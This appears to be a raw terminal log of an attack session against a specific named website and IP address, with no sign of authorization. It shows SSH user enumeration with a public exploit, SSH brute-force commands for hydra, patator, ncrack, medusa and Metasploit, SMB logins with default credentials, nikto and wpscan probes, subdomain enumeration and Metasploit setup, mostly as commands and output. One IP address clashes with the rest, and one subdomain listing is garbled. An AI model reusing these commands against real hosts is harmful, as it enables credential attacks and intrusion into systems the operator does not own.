  3005. root@blackbox:~# locate users | grep users.txt
  3006. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3007.  
  3008. msf5 > use auxiliary/scanner/ssh/ssh_enumusers
  3009. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
  3010. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 84.154.192.250
  3011. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3012. USER_FILE => /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3013. msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
  3014.  
  3015. SSH - User 'root' found
  3016.  
  3017. https://www.exploit-db.com/exploits/45210
  3018.  
  3019. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 admin
  3020. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 root
  3021.  
  3022.  
  3023. SSH BRUTE
  3024.  
  3025. use auxiliary/scanner/ssh/ssh_login
  3026. msf exploit (ssh_login)>set rhosts 184.154.192.250
  3027. msf exploit (ssh_login)>set user_file /root/Desktop/user.txt
  3028. msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt
  3029. msf exploit (ssh_login)>exploit
  3030.  
  3031.  
  3032. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /opt/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://184.154.192.250 -t 4
  3033.  
  3034. patator ssh_login host=184.154.192.250 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
  3035.  
  3036. ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 184.154.192.250:22
  3037.  
  3038. medusa -h 184.154.192.250 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
  3039.  
  3040.  
  3041. usernames list
  3042. /opt/SecLists/Usernames/top-usernames-shortlist.txt
  3043.  
  3044. passwords list
  3045. /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
  3046.  
  3047. passwords list combo
  3048. /opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
  3049.  
  3050. root@blackbox:~# ssh_scan -t 184.154.192.250
  3051.  
  3052.  
  3053. SSH SCAN
  3054.  
  3055. root@blackbox:/opt/smbmap# ssh_scan -t 184.154.192.250
  3056. [
  3057. {
  3058. "ssh_scan_version": "0.0.42",
  3059. "ip": "184.154.192.250",
  3060. "hostname": "server.etours.cn",
  3061. "port": 22,
  3062. "server_banner": "SSH-2.0-OpenSSH_4.3",
  3063. "ssh_version": 2.0,
  3064. "os": "unknown",
  3065. "os_cpe": "o:unknown",
  3066. "ssh_lib": "openssh",
  3067. "ssh_lib_cpe": "a:openssh:openssh:4.3",
  3068. "key_algorithms": [
  3069. "diffie-hellman-group-exchange-sha1",
  3070. "diffie-hellman-group14-sha1",
  3071. "diffie-hellman-group1-sha1"
  3072. ],
  3073. "encryption_algorithms_client_to_server": [
  3074. "aes128-ctr",
  3075. "aes192-ctr",
  3076. "aes256-ctr",
  3077. "arcfour256",
  3078. "arcfour128",
  3079. "aes128-cbc",
  3080. "3des-cbc",
  3081. "blowfish-cbc",
  3082. "cast128-cbc",
  3083. "aes192-cbc",
  3084. "aes256-cbc",
  3085. "arcfour",
  3086. ],
  3087. "encryption_algorithms_server_to_client": [
  3088. "aes128-ctr",
  3089. "aes192-ctr",
  3090. "aes256-ctr",
  3091. "arcfour256",
  3092. "arcfour128",
  3093. "aes128-cbc",
  3094. "3des-cbc",
  3095. "blowfish-cbc",
  3096. "cast128-cbc",
  3097. "aes192-cbc",
  3098. "aes256-cbc",
  3099. "arcfour",
  3100. ],
  3101. "mac_algorithms_client_to_server": [
  3102. "hmac-md5",
  3103. "hmac-sha1",
  3104. "hmac-ripemd160",
  3105. "hmac-sha1-96",
  3106. "hmac-md5-96"
  3107. ],
  3108. "mac_algorithms_server_to_client": [
  3109. "hmac-md5",
  3110. "hmac-sha1",
  3111. "hmac-ripemd160",
  3112. "hmac-sha1-96",
  3113. "hmac-md5-96"
  3114. ],
  3115. "compression_algorithms_client_to_server": [
  3116. "none",
  3117. ],
  3118. "compression_algorithms_server_to_client": [
  3119. "none",
  3120. ],
  3121. "languages_client_to_server": [
  3122.  
  3123. ],
  3124. "languages_server_to_client": [
  3125.  
  3126. ],
  3127. "auth_methods": [
  3128. "publickey",
  3129. "gssapi-with-mic",
  3130. "password"
  3131. ],
  3132. "keys": {
  3133. "rsa": {
  3134. "raw": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7KnYh43OYzJfoqtaHDqyUUbN3AkmyU4UhmHokahcHmg5okzEqkYX6IzLepxU1UgFFCaOMozBF/fU0iibocOidKZZST/13CvcRtaHXCwtZEFii+9NopBk08q7tCu0N6lv1IZKHWvBdIKalwzHpnwYntpvmPR3Y7tfHtxWpF/lh7TGCzdah1aeuET1P8hp7dGjkt6f07pbf/j/8CjMDp4DLVxRCdSL9DlZuqMYi0qZMk9g99YCorkQDUO20lHL89zzUXiDBEpEKVsrf9JFMb4/MRLaDQ8sVoBqPQRuFYFQaNgWkHs88OrtdV3MpMhaRxLcGcHtkzeAlc5OTAodzWgwxw==",
  3135. "length": 2048,
  3136. "fingerprints": {
  3137. "md5": "48:4f:ba:b1:e8:ae:12:ee:2b:e9:38:87:93:38:5c:4d",
  3138. "sha1": "0d:13:d6:24:42:42:85:97:36:3c:b4:57:c9:83:57:0c:12:73:4f:a2",
  3139. "sha256": "a8:0b:2f:13:a4:dd:f2:00:4f:ad:65:e7:18:70:d5:66:60:eb:34:0b:69:f0:b4:d6:b7:0a:03:01:37:56:f5:d9"
  3140. }
  3141. }
  3142. },
  3143. "dns_keys": [
  3144.  
  3145. ],
  3146. "duplicate_host_key_ips": [
  3147.  
  3148. ],
  3149. "compliance": {
  3150. "policy": "Mozilla Modern",
  3151. "compliant": false,
  3152. "recommendations": [
  3153. "Add these key exchange algorithms: [email protected],ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256",
  3154. "Add these MAC algorithms: [email protected],[email protected],[email protected],hmac-sha2-512,hmac-sha2-256,[email protected]",
  3155. "Add these encryption ciphers: [email protected],[email protected],[email protected]",
  3156. "Remove these key exchange algorithms: diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1",
  3157. "Remove these MAC algorithms: hmac-md5, hmac-sha1, hmac-ripemd160, [email protected], hmac-sha1-96, hmac-md5-96",
  3158. "Remove these encryption ciphers: arcfour256, arcfour128, aes128-cbc, 3des-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour, [email protected]",
  3159. "Remove these authentication methods: gssapi-with-mic, password"
  3160. ],
  3161. "references": [
  3162. "https://wiki.mozilla.org/Security/Guidelines/OpenSSH"
  3163. ],
  3164. "grade": "F"
  3165. },
  3166. "start_time": "2020-01-22 15:10:54 -0600",
  3167. "end_time": "2020-01-22 15:10:57 -0600",
  3168. "scan_duration_seconds": 3.036491516
  3169. }
  3170. ]
  3171.  
  3172.  
  3173. SMB CHECK
  3174.  
  3175.  
  3176. root@blackbox:/opt# git clone https://github.com/ShawnDEvans/smbmap.git
  3177. root@blackbox:/opt# cd smbmap/
  3178. root@blackbox:/opt/smbmap# python3 -m pip install -r requirements.txt
  3179.  
  3180. root@blackbox:/opt/smbmap# python3 smbmap.py -u admin -p admin -d workgroup -H 184.154.192.250
  3181.  
  3182. root@blackbox:/opt/smbmap# python3 smbmap.py -u guest -p "" -H 184.154.192.250
  3183.  
  3184. Using null session
  3185.  
  3186. root@blackbox:/opt/smbmap# python3 smbmap.py -H 184.154.192.250 -r
  3187.  
  3188. Guest Session with port specified for Samba
  3189.  
  3190. root@blackbox:/opt/smbmap# python3 smbmap.py -u "" -p "" -H 184.154.192.250 -P 139
  3191.  
  3192. root@blackbox:/opt/smbmap# python3 smbmap.py -u administrator -p administrator -H 184.154.192.250
  3193.  
  3194.  
  3195. root@blackbox:/opt/smbmap# nmap --script smb-vuln* -p 137,139,443,80,22,21 184.154.192.250 --open
  3196. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 15:08 CST
  3197. Nmap scan report for server.etours.cn (184.154.192.250)
  3198. Host is up (0.081s latency).
  3199. Not shown: 2 closed ports
  3200. PORT STATE SERVICE
  3201. 21/tcp open ftp
  3202. 22/tcp open ssh
  3203. 80/tcp open http
  3204. 443/tcp open https
  3205.  
  3206. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
  3207.  
  3208. NIKTO CHECK
  3209.  
  3210. root@blackbox:/opt# nikto -h etours.cn -C all
  3211. - Nikto v2.1.6
  3212. ---------------------------------------------------------------------------
  3213. + Target IP: 184.154.192.250
  3214. + Target Hostname: etours.cn
  3215. + Target Port: 80
  3216. + Start Time: 2020-01-23 03:57:53 (GMT-6)
  3217. ---------------------------------------------------------------------------
  3218. + Server: Apache
  3219. + The anti-clickjacking X-Frame-Options header is not present.
  3220. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3221. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3222. + Root page / redirects to: http://www.etours.cn/
  3223. + Retrieved x-powered-by header: PleskLin
  3224. + Server may leak inodes via ETags, header found with file /6BsxYMU7.pl, inode: 20758719, size: 954, mtime: Wed Sep 14 18:10:28 2011
  3225. + Uncommon header 'link' found, with contents: <http://www.etours.cn/blog/wp-json/>; rel="https://api.w.org/"
  3226. + OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
  3227. + OSVDB-3268: /icons/: Directory indexing found.
  3228. + OSVDB-3233: /icons/README: Apache default file found.
  3229. + 26400 requests: 0 error(s) and 9 item(s) reported on remote host
  3230. + End Time: 2020-01-23 06:12:41 (GMT-6) (8088 seconds)
  3231. ---------------------------------------------------------------------------
  3232. + 1 host(s) tested
  3233.  
  3234.  
  3235.  
  3236. http://www.etours.cn/blog/wp-json/
  3237.  
  3238. root@blackbox:/opt# git clone https://github.com/wpscanteam/wpscan.git
  3239. root@blackbox:/opt# cd wpscan
  3240. root@blackbox:/opt/wpscan# gem install wpscan
  3241.  
  3242.  
  3243. root@blackbox:/opt/wpscan# nano ~/.wpscan/scan.yml
  3244.  
  3245. cli_options:
  3246. api_token:
  3247.  
  3248. root@blackbox:/opt/wpscan# wpscan --url http://www.etours.cn/blog/ --enumerate u1-100
  3249. _______________________________________________________________
  3250. __ _______ _____
  3251. \ \ / / __ \ / ____|
  3252. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  3253. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  3254. \ /\ / | | ____) | (__| (_| | | | |
  3255. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  3256.  
  3257. WordPress Security Scanner by the WPScan Team
  3258. Version 3.7.7
  3259. Sponsored by Automattic - https://automattic.com/
  3260. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  3261. _______________________________________________________________
  3262.  
  3263. [+] URL: http://www.etours.cn/blog/
  3264. [+] Started: Wed Jan 22 16:15:53 2020
  3265.  
  3266. Interesting Finding(s):
  3267.  
  3268. [+] http://www.etours.cn/blog/
  3269. | Interesting Entries:
  3270. | - Server: Apache
  3271. | - X-Powered-By: PleskLin
  3272. | Found By: Headers (Passive Detection)
  3273. | Confidence: 100%
  3274.  
  3275. [+] http://www.etours.cn/blog/xmlrpc.php
  3276. | Found By: Link Tag (Passive Detection)
  3277. | Confidence: 100%
  3278. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
  3279. | References:
  3280. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3281. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3282. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3283. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3284. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3285.  
  3286. [+] http://www.etours.cn/blog/readme.html
  3287. | Found By: Direct Access (Aggressive Detection)
  3288. | Confidence: 100%
  3289.  
  3290. [+] http://www.etours.cn/blog/wp-cron.php
  3291. | Found By: Direct Access (Aggressive Detection)
  3292. | Confidence: 60%
  3293. | References:
  3294. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3295. | - https://github.com/wpscanteam/wpscan/issues/1299
  3296.  
  3297. [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
  3298. | Found By: Rss Generator (Passive Detection)
  3299. | - http://www.etours.cn/blog/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3300. | - http://www.etours.cn/blog/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3301. |
  3302. | [!] 12 vulnerabilities identified:
  3303. |
  3304. | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
  3305. | Fixed in: 5.1.2
  3306. | References:
  3307. | - https://wpvulndb.com/vulnerabilities/9867
  3308. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
  3309. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3310. | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
  3311. | - https://hackerone.com/reports/339483
  3312. |
  3313. | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
  3314. | Fixed in: 5.1.2
  3315. | References:
  3316. | - https://wpvulndb.com/vulnerabilities/9864
  3317. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
  3318. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3319. | - https://fortiguard.com/zeroday/FG-VD-18-165
  3320. | - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
  3321. |
  3322. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
  3323. | Fixed in: 5.1.3
  3324. | References:
  3325. | - https://wpvulndb.com/vulnerabilities/9908
  3326. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
  3327. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3328. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3329. |
  3330. | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
  3331. | Fixed in: 5.1.3
  3332. | References:
  3333. | - https://wpvulndb.com/vulnerabilities/9909
  3334. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
  3335. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3336. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3337. | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
  3338. | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
  3339. |
  3340. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
  3341. | Fixed in: 5.1.3
  3342. | References:
  3343. | - https://wpvulndb.com/vulnerabilities/9910
  3344. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
  3345. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3346. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3347. |
  3348. | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
  3349. | Fixed in: 5.1.3
  3350. | References:
  3351. | - https://wpvulndb.com/vulnerabilities/9911
  3352. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
  3353. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3354. | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
  3355. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3356. |
  3357. | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
  3358. | Fixed in: 5.1.3
  3359. | References:
  3360. | - https://wpvulndb.com/vulnerabilities/9912
  3361. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
  3362. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
  3363. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3364. | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
  3365. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3366. |
  3367. | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
  3368. | Fixed in: 5.1.3
  3369. | References:
  3370. | - https://wpvulndb.com/vulnerabilities/9913
  3371. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
  3372. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3373. | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
  3374. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3375. |
  3376. | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
  3377. | Fixed in: 5.1.4
  3378. | References:
  3379. | - https://wpvulndb.com/vulnerabilities/9973
  3380. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
  3381. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
  3382. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3383. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
  3384. |
  3385. | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
  3386. | Fixed in: 5.1.4
  3387. | References:
  3388. | - https://wpvulndb.com/vulnerabilities/9975
  3389. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
  3390. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3391. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3392. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3393. | - https://hackerone.com/reports/509930
  3394. | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
  3395. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
  3396. |
  3397. | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
  3398. | Fixed in: 5.1.4
  3399. | References:
  3400. | - https://wpvulndb.com/vulnerabilities/9976
  3401. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
  3402. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
  3403. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3404. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
  3405. |
  3406. | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
  3407. | Fixed in: 5.1.4
  3408. | References:
  3409. | - https://wpvulndb.com/vulnerabilities/10004
  3410. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
  3411. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3412. | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
  3413.  
  3414. [+] WordPress theme in use: twentyeleven
  3415. | Location: http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3416. | Last Updated: 2019-05-07T00:00:00.000Z
  3417. | Readme: http://www.etours.cn/blog/wp-content/themes/twentyeleven/readme.txt
  3418. | [!] The version is out of date, the latest version is 3.3
  3419. | Style URL: http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css
  3420. | Style Name: Twenty Eleven
  3421. | Style URI: http://wordpress.org/extend/themes/twentyeleven
  3422. | Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a cust...
  3423. | Author: the WordPress team
  3424. | Author URI: http://wordpress.org/
  3425. |
  3426. | Found By: Css Style In Homepage (Passive Detection)
  3427. | Confirmed By: Css Style In 404 Page (Passive Detection)
  3428. |
  3429. | Version: 1.2 (80% confidence)
  3430. | Found By: Style (Passive Detection)
  3431. | - http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css, Match: 'Version: 1.2'
  3432.  
  3433. [+] Enumerating Users (via Passive and Aggressive Methods)
  3434. Brute Forcing Author IDs - Time: 00:00:18 <==============================================================================================================> (100 / 100) 100.00% Time: 00:00:18
  3435.  
  3436. [i] User(s) Identified:
  3437.  
  3438. [+] admin
  3439. | Found By: Author Posts - Author Pattern (Passive Detection)
  3440. | Confirmed By:
  3441. | Rss Generator (Passive Detection)
  3442. | Wp Json Api (Aggressive Detection)
  3443. | - http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3444. | Rss Generator (Aggressive Detection)
  3445. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  3446. | Login Error Messages (Aggressive Detection)
  3447.  
  3448. [+] WPVulnDB API OK
  3449. | Plan: free
  3450. | Requests Done (during the scan): 2
  3451. | Requests Remaining: 48
  3452.  
  3453. [+] Finished: Wed Jan 22 16:16:42 2020
  3454. [+] Requests Done: 140
  3455. [+] Cached Requests: 7
  3456. [+] Data Sent: 32.334 KB
  3457. [+] Data Received: 488.05 KB
  3458. [+] Memory used: 138.605 MB
  3459. [+] Elapsed time: 00:00:48
  3460.  
  3461.  
  3462. http://www.etours.cn/blog/phpinfo.php
  3463.  
  3464. Proudly powered by WordPress
  3465.  
  3466. http://www.etours.cn/blog/wp-login.php
  3467.  
  3468.  
  3469. http://www.etours.cn/blog/
  3470. http://www.etours.cn/blog/xmlrpc.php
  3471. http://www.etours.cn/blog/readme.html
  3472. http://www.etours.cn/blog/wp-cron.php
  3473. http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3474. http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3475.  
  3476.  
  3477.  
  3478. SUBDOMAIN SCAN USING KNOCK
  3479.  
  3480.  
  3481. root@blackbox:/# cd /opt/
  3482. root@blackbox:/opt# apt-get install python-dnspython
  3483. root@blackbox:/opt# git clone https://github.com/guelfoweb/knock.git
  3484. root@blackbox:/opt# cd knock
  3485. root@blackbox:/opt/knock# leafpad knockpy/config.json
  3486.  
  3487. INSERT YOUR VIRUS TOTAL API KEY
  3488.  
  3489. root@blackbox:/opt/knock# python setup.py install
  3490.  
  3491.  
  3492. root@blackbox:/opt/knock# knockpy etours.cn
  3493.  
  3494. _ __ _
  3495. | |/ / | | 4.1.1
  3496. | ' / _ __ ___ ___| | ___ __ _ _
  3497. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3498. | . \| | | | (_) | (__| <| |_) | |_| |
  3499. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3500. | | __/ |
  3501. |_| |___/
  3502.  
  3503. + checking for virustotal subdomains: YES
  3504. [
  3505. "www.etours.cn",
  3506. "mail.etours.cn",
  3507. "beijing.etours.cn"
  3508. ]
  3509. + checking for wildcard: NO
  3510. + checking for zonetransfer: NO
  3511. + resolving target: YES
  3512. - scanning for subdomain...
  3513.  
  3514. Ip Address Status Type Domain Name Server
  3515. ---------- ------ ---- ----------- ------
  3516. 184.154.192.250 200 host beijing.etours.cn Apache
  3517. 184.154.192.250 200 host dns.etours.cn Apache
  3518. 184.154.192.250 200 host ftp.etours.cn Apache
  3519. 184.154.192.250 200 host mail.etours.cn Apache
  3520. 184.154.192.250 302 host webmail.etours.cn Apache
  3521. 184.154.192.250 200 host www.etours.cn Apache
  3522.  
  3523.  
  3524. Check zone transfer for domain name
  3525.  
  3526. root@blackbox:/opt/knock# knockpy -r etours.cn
  3527.  
  3528. _ __ _
  3529. | |/ / | | 4.1.1
  3530. | ' / _ __ ___ ___| | ___ __ _ _
  3531. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3532. | . \| | | | (_) | (__| <| |_) | |_| |
  3533. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3534. | | __/ |
  3535. |_| |___/
  3536.  
  3537. + checking for virustotal subdomains: YES
  3538. [
  3539. "www.etours.cn",
  3540. "mail.etours.cn",
  3541. "beijing.etours.cn"
  3542. ]
  3543. + checking for wildcard: NO
  3544. + checking for zonetransfer: NO
  3545. + resolving target: YES
  3546. {
  3547. "zonetransfer": {
  3548. "enabled": false,
  3549. "list": []
  3550. },
  3551. "target": "etours.cn",
  3552. "hostname": "etours.cn",
  3553. "virustotal": [
  3554. "www.etours.cn",
  3555. "mail.etours.cn",
  3556. "beijing.etours.cn"
  3557. ],
  3558. "alias": [],
  3559. "wildcard": {
  3560. "detected": {},
  3561. "test_target": "flvckazhp.etours.cn",
  3562. "enabled": false,
  3563. "http_response": {}
  3564. },
  3565. "ipaddress": [
  3566. "184.154.192.250"
  3567. ],
  3568. "response_time": "0.484440803528",
  3569. "http_response": {
  3570. "status": {
  3571. "reason": "Moved Permanently",
  3572. "code": 301
  3573. },
  3574. "http_headers": {
  3575. "date": "Wed, 22 Jan 2020 21:40:37 GMT",
  3576. "connection": "close",
  3577. "content-type": "text/html; charset=iso-8859-1",
  3578. "location": "http://www.etours.cn/",
  3579. "server": "Apache"
  3580. }
  3581. }
  3582. }
  3583.  
  3584.  
  3585.  
  3586. root@blackbox:/opt/knock# knockpy 184.154.192.250
  3587.  
  3588. _ __ _
  3589. | |/ / | | 4.1.1
  3590. | ' / _ __ ___ ___| | ___ __ _ _
  3591. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3592. | . \| | | | (_) | (__| <| |_) | |_| |
  3593. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3594. | | __/ |
  3595. |_| |___/
  3596.  
  3597. + checking for virustotal subdomains: NO
  3598. + checking for wildcard: NO
  3599. + checking for zonetransfer: NO
  3600. + resolving target: YES
  3601. - scanning for subdomain...
  3602.  
  3603. Ip Address Status Type Domain Name Server
  3604. ---------- ------ ---- ----------- ------
  3605.  
  3606.  
  3607. knockpy etours.cn
  3608.  
  3609. subdomain scan with external wordlist
  3610.  
  3611. root@blackbox:/opt/knock# locate subdomains.txt
  3612. /opt/SecLists/Discovery/DNS/shubs-subdomains.txt
  3613.  
  3614.  
  3615. root@blackbox:/opt/knock# knockpy etours.cn -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3616.  
  3617. _ __ _
  3618. | |/ / | | 4.1.1
  3619. | ' / _ __ ___ ___| | ___ __ _ _
  3620. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3621. | . \| | | | (_) | (__| <| |_) | |_| |
  3622. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3623. | | __/ |
  3624. |_| |___/
  3625.  
  3626. + checking for virustotal subdomains: YES
  3627. [
  3628. "www.etours.cn",
  3629. "mail.etours.cn",
  3630. "beijing.etours.cn"
  3631. ]
  3632. + checking for wildcard: NO
  3633. + checking for zonetransfer: NO
  3634. + resolving target: YES
  3635. - scanning for subdomain...
  3636.  
  3637. Ip Address Status Type Domain Name Server
  3638. ---------- ------ ---- ----------- ------
  3639. 184.154.192.250 200 host mbeijing.etours.cneuatmistir Apache
  3640. 184.154.192.250 200 host edns.etours.cnarelluraggyp.7236.nApache
  3641. 184.154.192.250 200 host aftp.etours.cnpa.977992.n3s10 Apache
  3642. 184.154.192.250 200 host 8mail.etours.cnneegrangese-lack.vApache
  3643. 184.154.192.250 302 host uwebmail.etours.cn-proxy-iossent Apache
  3644. 184.154.192.250 200 host nwww.etours.cnenor.en Apache
  3645.  
  3646.  
  3647. http://184.154.192.250:8880/login_up.php3
  3648. https://184.154.192.250:8443/login_up.php3
  3649.  
  3650.  
  3651.  
  3652. root@blackbox:~# gobuster dir -u 184.154.192.250 -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3653.  
  3654.  
  3655. root@blackbox:~# systemctl status postgresql.service
  3656.  
  3657. USE METASPLOIT
  3658.  
  3659.  
  3660. root@blackbox:~# cd /opt/metasploit-framework/
  3661.  
  3662. root@blackbox:/opt/metasploit-framework# su postgres
  3663. postgres@blackbox:/opt/metasploit-framework$ createuser msf_user -P
  3664. Enter password for new role: msf
  3665. Enter it again: msf
  3666. postgres@blackbox:/opt/metasploit-framework$ createdb --owner=msf_user msf_database
  3667. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3668.  
  3669. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3670.  
  3671. IIIIII dTb.dTb _.---._
  3672. II 4' v 'B .'"".'/|\`.""'.
  3673. II 6. .P : .' / | \ `. :
  3674. II 'T;. .;P' '.' / | \ `.'
  3675. II 'T; ;P' `. / | \ .'
  3676. IIIIII 'YvP' `-.__|__.-'
  3677.  
  3678. I love shells --egypt
  3679.  
  3680.  
  3681. =[ metasploit v5.0.72-dev- ]
  3682. + -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
  3683. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  3684. + -- --=[ 7 evasion ]
  3685.  
  3686.  
  3687. msf5 > db_status
  3688. [*] Connected to msf. Connection type: postgresql.
  3689.  
  3690.  
